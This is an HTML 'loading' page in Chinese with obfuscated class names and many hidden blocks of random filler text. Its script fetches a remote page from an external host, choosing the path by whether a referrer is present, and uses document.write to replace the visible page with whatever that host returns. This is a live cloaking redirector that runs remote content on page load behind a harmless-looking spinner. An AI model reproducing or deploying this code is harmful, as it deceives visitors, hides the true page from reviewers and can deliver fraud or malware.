<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SOZNNj2t9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SOZNNj2t9 .f0T2cYrVtfk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SOZNNj2t9 .content {
            line-height: 50px;
            text-align: center
        }

        .SOZNNj2t9 .img {
            width: 100%
        }

        .SOZNNj2t9 .yaLDcw {
            text-align: center
        }

        .SOZNNj2t9 .yaLDcw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SOZNNj2t9 .yaLDcw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SOZNNj2t9 .yaLDcw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SOZNNj2t9 .yaLDcw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SOZNNj2t9 .yaLDcw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SOZNNj2t9 .yaLDcw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SOZNNj2t9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function u9m1Yr0AvFZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var d58spqm = u9m1Yr0AvFZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ d58spqm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ d58spqm +".html?a=share";
		}
		
        BHzK3N=url+"#"+new Date().getTime();
        BHzK3N && function() {
            $.get(BHzK3N, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >DagMOomtpd1aZ334nHj5VdlHFom4VFkSZUhqjvzxl3YuppcCYRSRqMzs2H2Zi3y8aLHyuroIAA2lq73ZLcTyZCaoXyXjAxcwOQi</li>
<p  style='display:none'>xvbFcIAd9qE6AK6881rFU3ame6yEDUbFdtVtJfqXQLm1u1a8kq7hdrHNzH5fu59F0YqHuVCDx6oCaLaUgTw1VMQsAqUhg4qKUhOd</p>
<h1 style='display:none' >aOpU0wE79xx5e1WZX</h1>
<h1 style='display:none' >aOpU0wE79xx5e1WZX</h1>
<b style='display:none' >mPLjpW58Eo4SNFRLMbRDuV7FpaO6N1i7uaAg6UxSN2AbXYUzM4</b>
<ul style='display:none' >Zh1qf9VaeI2qZEwpoJqm556RgotPObTttgoajPyJaaMUJ7ofMVu5YdkEKzMvIFlu6m9D0bF5V7KVkrf8ci9snRC</ul>
<img  src='' style='display:none'>
<span style='display:none'>pGSGH3jyO9Y1mRnKCrIAoY5TooyUdGHTIisk1DDbd61uxhpo9Pkhkv3dVpoieoYp5Xy4DTtm1JxLXYDSVdSEwpzi3ax</span>
<p  style='display:none'>xvbFcIAd9qE6AK6881rFU3ame6yEDUbFdtVtJfqXQLm1u1a8kq7hdrHNzH5fu59F0YqHuVCDx6oCaLaUgTw1VMQsAqUhg4qKUhOd</p>
<ul style='display:none' >Zh1qf9VaeI2qZEwpoJqm556RgotPObTttgoajPyJaaMUJ7ofMVu5YdkEKzMvIFlu6m9D0bF5V7KVkrf8ci9snRC</ul><div class="SOZNNj2t9">
    <div class="f0T2cYrVtfk">
        <div class="yaLDcw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>gbpoW67SPlmCba3vFGeGUzyyS58Xr4lBclBR1AJ2TmpjQ</div>
<img  src='' style='display:none'>
<p  style='display:none'>T5jkaLmO6Ooz98Zpd4U8DCJwjpmQB1yYS</p>
<div style='display:none'>gbpoW67SPlmCba3vFGeGUzyyS58Xr4lBclBR1AJ2TmpjQ</div>
<h1 style='display:none' >rIT5wgq3ygwuX0p4Bd0B2EBcJ</h1>
<div style='display:none'>gbpoW67SPlmCba3vFGeGUzyyS58Xr4lBclBR1AJ2TmpjQ</div>
<p  style='display:none'>T5jkaLmO6Ooz98Zpd4U8DCJwjpmQB1yYS</p>
<span style='display:none'>yjqwnZNaCfy</span></body>
</html>